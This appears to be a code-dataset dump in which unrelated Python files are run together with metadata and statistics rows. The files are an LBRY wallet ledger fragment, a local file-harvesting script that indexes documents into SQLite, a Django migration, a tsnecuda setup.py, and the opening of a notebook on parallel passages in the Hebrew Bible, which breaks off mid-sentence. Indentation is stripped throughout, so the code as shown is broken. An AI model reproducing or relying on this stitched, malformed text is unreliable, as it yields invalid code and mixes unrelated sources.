extended_public_key_prefix = unhexlify('0488b21e')
extended_private_key_prefix = unhexlify('0488ade4')
max_target = 0x0000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
genesis_hash = '9c89283ba0f3227f6c03b70216b9f665f0118d5e0fa729cedf4fb34d6a34f463'
genesis_bits = 0x1f00ffff
target_timespan = 150
default_fee_per_byte = 50
default_fee_per_name_char = 200000
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fee_per_name_char = self.config.get('fee_per_name_char', self.default_fee_per_name_char)
@property
def resolver(self):
return Resolver(self.headers.claim_trie_root, self.headers.height, self.transaction_class,
hash160_to_address=self.hash160_to_address, network=self.network)
@defer.inlineCallbacks
def resolve(self, page, page_size, *uris):
for uri in uris:
try:
parse_lbry_uri(uri)
except URIParseError as err:
defer.returnValue({'error': err.message})
resolutions = yield self.network.get_values_for_uris(self.headers.hash().decode(), *uris)
return (yield self.resolver._handle_resolutions(resolutions, uris, page, page_size))
@defer.inlineCallbacks
def get_claim_by_claim_id(self, claim_id):
result = (yield self.network.get_claims_by_ids(claim_id)).pop(claim_id, {})
return (yield self.resolver.get_certificate_and_validate_result(result))
@defer.inlineCallbacks
def get_claim_by_outpoint(self, txid, nout):
claims = (yield self.network.get_claims_in_tx(txid)) or []
for claim in claims:
if claim['nout'] == nout:
return (yield self.resolver.get_certificate_and_validate_result(claim))
return 'claim not found'
@defer.inlineCallbacks
def start(self):
yield super().start()
yield defer.DeferredList([
a.maybe_migrate_certificates() for a in self.accounts
])
class TestNetLedger(MainNetLedger):
network_name = 'testnet'
pubkey_address_prefix = int2byte(111)
script_address_prefix = int2byte(196)
extended_public_key_prefix = unhexlify('043587cf')
extended_private_key_prefix = unhexlify('04358394')
class RegTestLedger(MainNetLedger):
network_name = 'regtest'
headers_class = UnvalidatedHeaders
pubkey_address_prefix = int2byte(111)
script_address_prefix = int2byte(196)
extended_public_key_prefix = unhexlify('043587cf')
extended_private_key_prefix = unhexlify('04358394')
max_target = 0x7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
genesis_hash = '6e3fcf1299d4ec5d79c3a4c91d624a4acf9e2e173d95a1a0504f677669687556'
genesis_bits = 0x207fffff
target_timespan = 1
| 34.12037 | 101 | 0.735414 | 408 | 3,685 | 6.345588 | 0.335784 | 0.037852 | 0.048667 | 0.02163 | 0.250676 | 0.17613 | 0.150637 | 0.150637 | 0.150637 | 0.108922 | 0 | 0.06091 | 0.189145 | 3,685 | 107 | 102 | 34.439252 | 0.805556 | 0 | 0 | 0.142857 | 0 | 0 | 0.068657 | 0.034735 | 0 | 0 | 0.044505 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.154762 | 0.011905 | 0.72619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
a1490edf966fa802ac0a01963e5d3d0e3138778b | 5,091 | py | Python | pyHarvest_build_151223/pyHarvest_Analyse_Data_v1.py | bl305/pyHarvest | d4c62d443ca657f9d31245c3c3f24c741cf2ae0b | [
"CC0-1.0"
] | null | null | null | pyHarvest_build_151223/pyHarvest_Analyse_Data_v1.py | bl305/pyHarvest | d4c62d443ca657f9d31245c3c3f24c741cf2ae0b | [
"CC0-1.0"
] | null | null | null | pyHarvest_build_151223/pyHarvest_Analyse_Data_v1.py | bl305/pyHarvest | d4c62d443ca657f9d31245c3c3f24c741cf2ae0b | [
"CC0-1.0"
] | null | null | null | # coding=utf-8
from packages import *
import os
#SET PARAMETERS
myverbosity=-1
mymaxencode=5
TXT_filetypes=(
#simple text files
'txt','lst',
#config files
'ini','cfg',
#programming languages
'c','cpp',
#scripts
'vbs','py','pl')
XLS_filetypes=('xls','xlsx')
DOC_filetypes=('doc',)
DOCX_filetypes=('docx',)
PDF_filetypes=('pdf',)
#TEMPLATE FILES
myXLSpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\XLS\test.xlsx'
myTXTpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\TXT\normal.txt'
#myTXTpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\TXT\unicode.txt'
#myTXTpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\TXT\unicode_big.txt'
#myTXTpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\TXT\unicode_utf8.txt'
#myTXTpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\TXT\x.txt'
#myPDFpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\PDF\test.pdf'
#myPDFpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\PDF\xtest.pdf'
myPDFpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\PDF\ztest.pdf'
myDOCpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\DOC\xtest.doc'
myDOCXpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\DOC\xtest.docx'
mydirpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles'
#mydirpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\DataGathered'
#mypath=myTXTpath
#mypath=myXLSpath
#mypath=myPDFpath
#mypath=myDOCpath
#mypath=myDOCXpath
#PROGRAM START
def process_myfile(thepath,verbosity=0):
#Select file type
fileextension=""
result=()
if '.' in thepath:
fileextension = thepath.rsplit('.', 1)[1]
if fileextension in DOC_filetypes:
doc_match=doc_full_search_tuple(thepath,myverbosity)
if doc_match:
result+=(doc_match,'doc')
if verbosity>1:
print doc_match
elif fileextension in DOCX_filetypes:
docx_match=docx_full_search_tuple(thepath,myverbosity)
if docx_match:
result+=(docx_match,'docx')
if verbosity>1:
print docx_match
elif fileextension in XLS_filetypes:
#PROCESS XLS
#xls_match=xls_full_search_tuple(thepath,verbosity=myverbosity)
xls_match=xls_full_search_tuple(thepath,myverbosity)
if xls_match:
result+=(xls_match,'xlsx')
if verbosity>1:
print xls_match
#print xls_match[-1]
elif fileextension in PDF_filetypes:
pdf_match=pdf_full_search_tuple(thepath,myverbosity)
if pdf_match:
result+=(pdf_match,'pdf')
if verbosity>1:
print pdf_match
#print pdf_match[-1]
elif fileextension in TXT_filetypes:
#PROCESS TXT
#txt_match=txt_full_search_tuple(thepath,maxencode=mymaxencode,verbosity=myverbosity)
txt_match=txt_full_search_tuple(thepath,mymaxencode,myverbosity)
if txt_match:
result+=(txt_match,'txt')
if verbosity>1:
print txt_match
#print txt_match[-1]
else:
print "[-] UNKNOWN filetype",thepath
return result
def process_localdir(localdir,recursive=0):
results=()
if recursive==0:
#files = [ f for f in os.listdir(localdir) if os.path.isfile(os.path.join(localdir,f)) ]
for files in os.listdir(localdir):
if os.path.isfile(os.path.join(localdir,files)):
abspath=os.path.join(localdir,files)
abspath = os.path.normpath(abspath).replace('//','/')
#print abspath
results+=(abspath,)
else:
for subdir, dirs, files in os.walk(localdir):
for file in files:
abspath=os.path.join(subdir,file)
abspath = os.path.normpath(abspath).replace('//','/')
#print abspath
results+=(abspath,)
return results
#print "##########################Main Program Started##########################"
#ANALYSE A SPECIFIC FILE
#process_myfile(mypath)
#ANALYSE ALL FILES IN A SPECIFIED DIRECTORY
filesindir=process_localdir(mydirpath,1)
Analysisconn, Analysisc = db_connect(Analysis_sqlite_file)
create_host_db(Analysisconn, Analysis_create_script,print_out=False)
filecount=len(filesindir)
filecounter=1
if filecount==0:
print "No files to analyse"
for fn in range(len(filesindir)):
mytext=process_myfile(filesindir[fn])
print "Analysing file %d/%d %s"%(filecounter,filecount,filesindir[fn])
filecounter+=1
if mytext:
ftype=mytext[1]
mytextdata=mytext[0]
insert_analysis_data(Analysisc,Analysis_table_name,mytextdata,ftype,print_out=False)
db_commit(Analysisconn)
pass
db_commit(Analysisconn)
db_close(Analysisconn)
print (raw_input('Press Enter to Exit!')) | 36.891304 | 144 | 0.792772 | 698 | 5,091 | 5.537249 | 0.216332 | 0.039845 | 0.026908 | 0.05718 | 0.513842 | 0.495213 | 0.464683 | 0.43053 | 0.421475 | 0.421475 | 0 | 0.004935 | 0.084463 | 5,091 | 138 | 145 | 36.891304 | 0.824287 | 0.316637 | 0 | 0.141304 | 0 | 0 | 0.25737 | 0.214033 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.01087 | 0.021739 | null | null | 0.119565 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1537d70484481dc31d44d35ec4975bba8b264f5 | 1,038 | py | Python | product/migrations/0001_initial.py | dnetochaves/e-commerce | 97c2266934b6db883d520381520130b0472e9db4 | [
"MIT"
] | null | null | null | product/migrations/0001_initial.py | dnetochaves/e-commerce | 97c2266934b6db883d520381520130b0472e9db4 | [
"MIT"
] | null | null | null | product/migrations/0001_initial.py | dnetochaves/e-commerce | 97c2266934b6db883d520381520130b0472e9db4 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.4 on 2020-12-27 15:03
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('short_description', models.TextField(max_length=255)),
('long_description', models.TextField()),
('image', models.ImageField(blank=True, null=True, upload_to='product_pictures/%Y/%m')),
('slug', models.SlugField(unique=True)),
('price_marketing', models.FloatField()),
('price_marketing_promotion', models.FloatField(default=0)),
('FIELDNAME', models.CharField(choices=[('V', 'Variação'), ('S', 'Simples')], default='V', max_length=1)),
],
),
]
| 35.793103 | 122 | 0.575145 | 104 | 1,038 | 5.615385 | 0.653846 | 0.046233 | 0.041096 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030383 | 0.270713 | 1,038 | 28 | 123 | 37.071429 | 0.741083 | 0.043353 | 0 | 0 | 1 | 0 | 0.147326 | 0.047427 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.238095 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a155e11f0e425a96e53ea2166d51415855a2b463 | 921 | py | Python | src/python/setup.py | Basasuya/tsne-cuda | dc518acd9fdf9109952ffe57d6cf12363e3ffd2c | [
"BSD-3-Clause"
] | 2 | 2021-04-30T16:48:47.000Z | 2021-05-21T08:49:13.000Z | src/python/setup.py | Basasuya/tsne-cuda | dc518acd9fdf9109952ffe57d6cf12363e3ffd2c | [
"BSD-3-Clause"
] | null | null | null | src/python/setup.py | Basasuya/tsne-cuda | dc518acd9fdf9109952ffe57d6cf12363e3ffd2c | [
"BSD-3-Clause"
] | 1 | 2021-04-25T23:11:05.000Z | 2021-04-25T23:11:05.000Z | from setuptools import setup
setup(
name='tsnecuda',
version='2.1.0',
author='Chan, David M., Huang, Forrest., Rao, Roshan.',
author_email='davidchan@berkeley.edu',
packages=['tsnecuda', 'tsnecuda.test'],
package_data={'tsnecuda': ['libtsnecuda.so']},
scripts=[],
url='https://github.com/CannyLab/tsne-cuda',
license='LICENSE.txt',
description='CUDA Implementation of T-SNE with Python bindings',
long_description=open('README.txt').read(),
install_requires=[
'numpy >= 1.14.1',
],
classifiers=[
'Programming Language :: Python :: 3.6',
'Operating System :: POSIX :: Linux',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Artificial Intelligence'
],
keywords=[
'TSNE',
'CUDA',
'Machine Learning',
'AI'
]
)
| 27.909091 | 68 | 0.598263 | 93 | 921 | 5.88172 | 0.827957 | 0.02925 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012857 | 0.239957 | 921 | 32 | 69 | 28.78125 | 0.768571 | 0 | 0 | 0.066667 | 0 | 0 | 0.508143 | 0.047774 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.033333 | 0 | 0.033333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a15747184e94e78f55f7ab475ca0b1abe33741e3 | 107,889 | py | Python | programs/parallels.py | ETCBC/parallells | f45f6cc3c4f933dba6e649f49cdb14a40dcf333f | [
"MIT"
] | 4 | 2017-10-01T05:14:59.000Z | 2020-09-09T09:41:26.000Z | programs/parallels.py | ETCBC/parallells | f45f6cc3c4f933dba6e649f49cdb14a40dcf333f | [
"MIT"
] | null | null | null | programs/parallels.py | ETCBC/parallells | f45f6cc3c4f933dba6e649f49cdb14a40dcf333f | [
"MIT"
] | 1 | 2020-10-16T13:21:51.000Z | 2020-10-16T13:21:51.000Z | #!/usr/bin/env python
# coding: utf-8
# <h1>Table of Contents<span class="tocSkip"></span></h1>
# <div class="toc" style="margin-top: 1em;"><ul class="toc-item"><li><span><a href="#0.1-Motivation" data-toc-modified-id="0.1-Motivation-1"><span class="toc-item-num">1 </span>0.1 Motivation</a></span></li><li><span><a href="#0.3-Open-Source" data-toc-modified-id="0.3-Open-Source-2"><span class="toc-item-num">2 </span>0.3 Open Source</a></span></li><li><span><a href="#0.4-What-are-parallel-passages?" data-toc-modified-id="0.4-What-are-parallel-passages?-3"><span class="toc-item-num">3 </span>0.4 What are parallel passages?</a></span></li><li><span><a href="#0.5-Authors" data-toc-modified-id="0.5-Authors-4"><span class="toc-item-num">4 </span>0.5 Authors</a></span></li><li><span><a href="#0.6-Status" data-toc-modified-id="0.6-Status-5"><span class="toc-item-num">5 </span>0.6 Status</a></span></li><li><span><a href="#2.1-Assessing-the-outcomes" data-toc-modified-id="2.1-Assessing-the-outcomes-6"><span class="toc-item-num">6 </span>2.1 Assessing the outcomes</a></span><ul class="toc-item"><li><span><a href="#2.1.1-Assessment-criteria" data-toc-modified-id="2.1.1-Assessment-criteria-6.1"><span class="toc-item-num">6.1 </span>2.1.1 Assessment criteria</a></span></li></ul></li><li><span><a href="#3.1-Similarity" data-toc-modified-id="3.1-Similarity-7"><span class="toc-item-num">7 </span>3.1 Similarity</a></span><ul class="toc-item"><li><span><a href="#3.1.1-SET" data-toc-modified-id="3.1.1-SET-7.1"><span class="toc-item-num">7.1 </span>3.1.1 SET</a></span></li><li><span><a href="#3.1.2-LCS" data-toc-modified-id="3.1.2-LCS-7.2"><span class="toc-item-num">7.2 </span>3.1.2 LCS</a></span></li></ul></li><li><span><a href="#3.2-Performance" data-toc-modified-id="3.2-Performance-8"><span class="toc-item-num">8 </span>3.2 Performance</a></span></li><li><span><a href="#4.1-Chunking" data-toc-modified-id="4.1-Chunking-9"><span class="toc-item-num">9 </span>4.1 Chunking</a></span><ul class="toc-item"><li><span><a href="#4.1.1-Fixed-chunking" data-toc-modified-id="4.1.1-Fixed-chunking-9.1"><span class="toc-item-num">9.1 </span>4.1.1 Fixed chunking</a></span></li><li><span><a href="#4.1.2-Object-chunking" data-toc-modified-id="4.1.2-Object-chunking-9.2"><span class="toc-item-num">9.2 </span>4.1.2 Object chunking</a></span></li></ul></li><li><span><a href="#4.2-Preparing" data-toc-modified-id="4.2-Preparing-10"><span class="toc-item-num">10 </span>4.2 Preparing</a></span></li><li><span><a href="#4.3-Cliques" data-toc-modified-id="4.3-Cliques-11"><span class="toc-item-num">11 </span>4.3 Cliques</a></span><ul class="toc-item"><li><span><a href="#4.3.1-Organizing-the-cliques" data-toc-modified-id="4.3.1-Organizing-the-cliques-11.1"><span class="toc-item-num">11.1 </span>4.3.1 Organizing the cliques</a></span></li><li><span><a href="#4.3.2-Evaluating-clique-sets" data-toc-modified-id="4.3.2-Evaluating-clique-sets-11.2"><span class="toc-item-num">11.2 </span>4.3.2 Evaluating clique sets</a></span></li></ul></li><li><span><a href="#5.1-Loading-the-feature-data" data-toc-modified-id="5.1-Loading-the-feature-data-12"><span class="toc-item-num">12 </span>5.1 Loading the feature data</a></span></li><li><span><a href="#5.2-Configuration" data-toc-modified-id="5.2-Configuration-13"><span class="toc-item-num">13 </span>5.2 Configuration</a></span></li><li><span><a href="#5.3-Experiment-settings" data-toc-modified-id="5.3-Experiment-settings-14"><span class="toc-item-num">14 </span>5.3 Experiment settings</a></span></li><li><span><a href="#5.4-Chunking" data-toc-modified-id="5.4-Chunking-15"><span class="toc-item-num">15 </span>5.4 Chunking</a></span></li><li><span><a href="#5.5-Preparing" data-toc-modified-id="5.5-Preparing-16"><span class="toc-item-num">16 </span>5.5 Preparing</a></span><ul class="toc-item"><li><span><a href="#5.5.1-Preparing-for-SET-comparison" data-toc-modified-id="5.5.1-Preparing-for-SET-comparison-16.1"><span class="toc-item-num">16.1 </span>5.5.1 Preparing for SET comparison</a></span></li><li><span><a href="#5.5.2-Preparing-for-LCS-comparison" data-toc-modified-id="5.5.2-Preparing-for-LCS-comparison-16.2"><span class="toc-item-num">16.2 </span>5.5.2 Preparing for LCS comparison</a></span></li></ul></li><li><span><a href="#5.6-Similarity-computation" data-toc-modified-id="5.6-Similarity-computation-17"><span class="toc-item-num">17 </span>5.6 Similarity computation</a></span><ul class="toc-item"><li><span><a href="#5.6.1-SET-similarity" data-toc-modified-id="5.6.1-SET-similarity-17.1"><span class="toc-item-num">17.1 </span>5.6.1 SET similarity</a></span></li><li><span><a href="#5.6.2-LCS-similarity" data-toc-modified-id="5.6.2-LCS-similarity-17.2"><span class="toc-item-num">17.2 </span>5.6.2 LCS similarity</a></span></li></ul></li><li><span><a href="#5.7-Cliques" data-toc-modified-id="5.7-Cliques-18"><span class="toc-item-num">18 </span>5.7 Cliques</a></span></li><li><span><a href="#5.7.1-Selecting-passages" data-toc-modified-id="5.7.1-Selecting-passages-19"><span class="toc-item-num">19 </span>5.7.1 Selecting passages</a></span></li><li><span><a href="#5.7.2-Growing-cliques" data-toc-modified-id="5.7.2-Growing-cliques-20"><span class="toc-item-num">20 </span>5.7.2 Growing cliques</a></span></li><li><span><a href="#5.8-Output" data-toc-modified-id="5.8-Output-21"><span class="toc-item-num">21 </span>5.8 Output</a></span><ul class="toc-item"><li><span><a href="#5.8.1-Format-definitions" data-toc-modified-id="5.8.1-Format-definitions-21.1"><span class="toc-item-num">21.1 </span>5.8.1 Format definitions</a></span></li><li><span><a href="#5.8.2-Formatting-clique-lists" data-toc-modified-id="5.8.2-Formatting-clique-lists-21.2"><span class="toc-item-num">21.2 </span>5.8.2 Formatting clique lists</a></span></li><li><span><a href="#5.8.3-Compiling-the-table-of-experiments" data-toc-modified-id="5.8.3-Compiling-the-table-of-experiments-21.3"><span class="toc-item-num">21.3 </span>5.8.3 Compiling the table of experiments</a></span></li><li><span><a href="#5.8.4-High-level-formatting-functions" data-toc-modified-id="5.8.4-High-level-formatting-functions-21.4"><span class="toc-item-num">21.4 </span>5.8.4 High level formatting functions</a></span></li></ul></li><li><span><a href="#5.9-Running-experiments" data-toc-modified-id="5.9-Running-experiments-22"><span class="toc-item-num">22 </span>5.9 Running experiments</a></span></li><li><span><a href="#Discussion" data-toc-modified-id="Discussion-23"><span class="toc-item-num">23 </span>Discussion</a></span></li></ul></div>
# <img align="right" src="images/dans-small.png"/>
# <img align="right" src="images/tf-small.png"/>
# <img align="right" src="images/etcbc.png"/>
#
#
# # Parallel Passages in the MT
#
# # 0. Introduction
#
# ## 0.1 Motivation
# We want to make a list of **all** parallel passages in the Masoretic Text (MT) of the Hebrew Bible.
#
# Here is a quote that triggered Dirk to write this notebook:
#
# > Finally, the Old Testament Parallels module in Accordance is a helpful resource that enables the researcher to examine 435 sets of parallel texts, or in some cases very similar wording in different texts, in both the MT and translation, but the large number of sets of texts in this database should not fool one to think it is complete or even nearly complete for all parallel writings in the Hebrew Bible.
#
# Robert Rezetko and Ian Young.
# Historical linguistics & Biblical Hebrew. Steps Toward an Integrated Approach.
# *Ancient Near East Monographs, Number9*. SBL Press Atlanta. 2014.
# [PDF Open access available](https://www.google.nl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CCgQFjAB&url=http%3A%2F%2Fwww.sbl-site.org%2Fassets%2Fpdfs%2Fpubs%2F9781628370461_OA.pdf&ei=2QSdVf-vAYSGzAPArJeYCg&usg=AFQjCNFA3TymYlsebQ0MwXq2FmJCSHNUtg&sig2=LaXuAC5k3V7fSXC6ZVx05w&bvm=bv.96952980,d.bGQ)
# <img align="right" width="50%" src="parallel.png"/>
#
# ## 0.3 Open Source
# This is an IPython notebook.
# It contains a working program to carry out the computations needed to obtain the results reported here.
#
# You can download this notebook and run it on your computer, provided you have
# [Text-Fabric](https://github.com/Dans-labs/text-fabric) installed.
#
# It is a pity that we cannot compare our results with the Accordance resource mentioned above,
# since that resource has not been published in an accessible manner.
# We also do not have the information how this resource has been constructed on the basis of the raw data.
# In contrast with that, we present our results in a completely reproducible manner.
# This notebook itself can serve as the method of replication,
# provided you have obtained the necessary resources.
# See [sources](https://github.com/ETCBC/shebanq/wiki/Sources), which are all Open Access.
#
# ## 0.4 What are parallel passages?
# The notion of *parallel passage* is not a simple, straightforward one.
# There are parallels on the basis of lexical content in the passages on the one hand,
# but on the other hand there are also correspondences in certain syntactical structures,
# or even in similarities in text structure.
#
# In this notebook we do select a straightforward notion of parallel, based on lexical content only.
# We investigate two measures of similarity, one that ignores word order completely,
# and one that takes word order into account.
#
# Two kinds of short-comings of this approach must be mentioned:
#
# 1. We will not find parallels based on non-lexical criteria (unless they are also lexical parallels)
# 1. We will find too many parallels: certain short sentences (and he said), or formula like passages (and the word of God came to Moses) occur so often that they have a more subtle bearing on whether there is a common text history.
#
# For a more full treatment of parallel passages, see
#
# **Wido Th. van Peursen and Eep Talstra**:
# Computer-Assisted Analysis of Parallel Texts in the Bible -
# The Case of 2 Kings xviii-xix and its Parallels in Isaiah and Chronicles.
# *Vetus Testamentum* 57, pp. 45-72.
# 2007, Brill, Leiden.
#
# Note that our method fails to identify any parallels with Chronica_II 32.
# Van Peursen and Talstra state about this chapter and 2 Kings 18:
#
# > These chapters differ so much, that it is sometimes impossible to establish
# which verses should be considered parallel.
#
# In this notebook we produce a set of *cliques*,
# a clique being a set of passages that are *quite* similar, based on lexical information.
#
#
# ## 0.5 Authors
# This notebook is by Dirk Roorda and owes a lot to discussions with Martijn Naaijer.
#
# [Dirk Roorda](mailto:dirk.roorda@dans.knaw.nl) while discussing ideas with
# [Martijn Naaijer](mailto:m.naaijer@vu.nl).
#
#
# ## 0.6 Status
#
# * **modified: 2017-09-28** Is now part of a pipeline for transferring data from the ETCBC to Text-Fabric.
# * **modified: 2016-03-03** Added experiments based on chapter chunks and lower similarities.
#
# 165 experiments have been carried out, of which 18 with promising results.
# All results can be easily inspected, just by clicking in your browser.
# One of the experiments has been chosen as the basis for
# [crossref](https://shebanq.ancient-data.org/hebrew/note?version=4b&id=Mnxjcm9zc3JlZg__&tp=txt_tb1&nget=v)
# annotations in SHEBANQ.
#
# # 1. Results
#
# Click in a green cell to see interesting results. The numbers in the cell indicate
#
# * the number of passages that have a variant elsewhere
# * the number of *cliques* they form (cliques are sets of similar passages)
# * the number of passages in the biggest clique
#
# Below the results is an account of the method that we used, followed by the actual code to produce these results.
# # Pipeline
# See [operation](https://github.com/ETCBC/pipeline/blob/master/README.md#operation)
# for how to run this script in the pipeline.
#
# The pipeline comes in action in Section [6a](#6a) below: TF features.
# # Caveat
#
# This notebook makes use of a new feature of text-fabric, first present in 2.3.15.
# Make sure to upgrade first.
#
# ```
# sudo -H pip3 install --upgrade text-fabric
# ```
# In[1]:
import sys
import os
import re
import collections
import pickle
import math
import difflib
import yaml
from difflib import SequenceMatcher
from IPython.display import HTML
import matplotlib.pyplot as plt
from tf.core.helpers import formatMeta
# pip3 install python-Levenshtein
# In[2]:
from Levenshtein import ratio
# In[3]:
import utils
from tf.fabric import Fabric
# In[4]:
get_ipython().run_line_magic("load_ext", "autoreload") # noqa F821
get_ipython().run_line_magic("autoreload", "2") # noqa F821
get_ipython().run_line_magic("matplotlib", "inline") # noqa F821
# In[2]:
# In[5]:
if "SCRIPT" not in locals():
# SCRIPT = False
SCRIPT = False
FORCE = True
FORCE_MATRIX = False
LANG_FEATURE = "languageISO"
OCC_FEATURE = "g_cons"
LEX_FEATURE = "lex"
TEXT_FEATURE = "g_word_utf8"
TRAILER_FEATURE = "trailer_utf8"
CORE_NAME = "bhsa"
NAME = "parallels"
VERSION = "2021"
# In[6]:
def stop(good=False):
if SCRIPT:
sys.exit(0 if good else 1)
# In[3]:
# In[7]:
# run this cell after all other cells
if False and not SCRIPT:
HTML(other_exps)
# # 2. Experiments
#
# We have conducted 165 experiments, all corresponding to a specific choice of parameters.
# Every experiment is an attempt to identify variants and collect them in *cliques*.
#
# The table gives an overview of the experiments conducted.
#
# Every *row* corresponds to a particular way of chunking and a method of measuring the similarity.
#
# There are *columns* for each similarity *threshold* that we have tried.
# The idea is that chunks are similar if their similarity is above the threshold.
#
# The outcomes of one experiment have been added to SHEBANQ as the note set
# [crossref](https://shebanq.ancient-data.org/hebrew/note?version=4b&id=Mnxjcm9zc3JlZg__&tp=txt_tb1&nget=v).
# The experiment chosen for this is currently
#
# * *chunking*: **object verse**
# * *similarity method*: **SET**
# * *similarity threshold*: **65**
#
#
# ## 2.1 Assessing the outcomes
#
# Not all experiments lead to useful results.
# We have indicated the value of a result by a color coding, based on objective characteristics,
# such as the number of parallel passages, the number of cliques, the size of the greatest clique, and the way of chunking.
# These numbers are shown in the cells.
#
# ### 2.1.1 Assessment criteria
#
# If the method is based on *fixed* chunks, we deprecated the method and the results.
# Because two perfectly similar verses could be missed if a 100-word wide window that shifts over the text aligns differently with both verses, which will usually be the case.
#
# Otherwise, we consider the *ll*, the length of the longest clique, and *nc*, the number of cliques.
# We set three quality parameters:
# * `REC_CLIQUE_RATIO` = 5 : recommended clique ratio
# * `DUB_CLIQUE_RATIO` = 15 : dubious clique ratio
# * `DEP_CLIQUE_RATIO` = 25 : deprecated clique ratio
#
# where the *clique ratio* is $100 (ll/nc)$,
# i.e. the length of the longest clique divided by the number of cliques as percentage.
#
# An experiment is *recommended* if its clique ratio is between the recommended and dubious clique ratios.
#
# It is *dubious* if its clique ratio is between the dubious and deprecated clique ratios.
#
# It is *deprecated* if its clique ratio is above the deprecated clique ratio.
#
# # 2.2 Inspecting results
# If you click on the hyperlink in the cell, you are taken to a page that gives you
# all the details of the results:
#
# 1. A link to a file with all *cliques* (which are the sets of similar passages)
# 1. A list of links to chapter-by-chapter diff files (for cliques with just two members), and only for
# experiments with outcomes that are labeled as *promising* or *unassessed quality* or *mixed results*.
#
# To get into the variants quickly, inspect the list (2) and click through
# to see the actual variant material in chapter context.
#
# Not all variants occur here, so continue with (1) to see the remaining cliques.
#
# Sometimes in (2) a chapter diff file does not indicate clearly the relevant common part of both chapters.
# In that case you have to consult the big list (1)
#
# All these results can be downloaded from the
# [SHEBANQ github repo](https://github.com/ETCBC/shebanq/tree/master/static/docs/tools/parallel/files)
# After downloading the whole directory, open ``experiments.html`` in your browser.
# # 3. Method
#
# Here we discuss the method we used to arrive at a list of parallel passages
# in the Masoretic Text (MT) of the Hebrew Bible.
#
# ## 3.1 Similarity
#
# We have to find passages in the MT that are *similar*.
# Therefore we *chunk* the text in some way, and then compute the similarities between pairs of chunks.
#
# There are many ways to define and compute similarity between texts.
# Here, we have tried two methods ``SET`` and ``LCS``.
# Both methods define similarity as the fraction of common material with respect to the total material.
#
# ### 3.1.1 SET
#
# The ``SET`` method reduces textual chunks to *sets* of *lexemes*.
# This method abstracts from the order and number of occurrences of words in chunks.
#
# We use as measure for the similarity of chunks $C_1$ and $C_2$ (taken as sets):
#
# $$ s_{\rm set}(C_1, C_2) = {\vert C_1 \cap C_2\vert \over \vert C_1 \cup C_2 \vert} $$
#
# where $\vert X \vert$ is the number of elements in set $X$.
#
# ### 3.1.2 LCS
#
# The ``LCS`` method is less reductive: chunks are *strings* of *lexemes*,
# so the order and number of occurrences of words is retained.
#
# We use as measure for the similarity of chunks $C_1$ and $C_2$ (taken as strings):
#
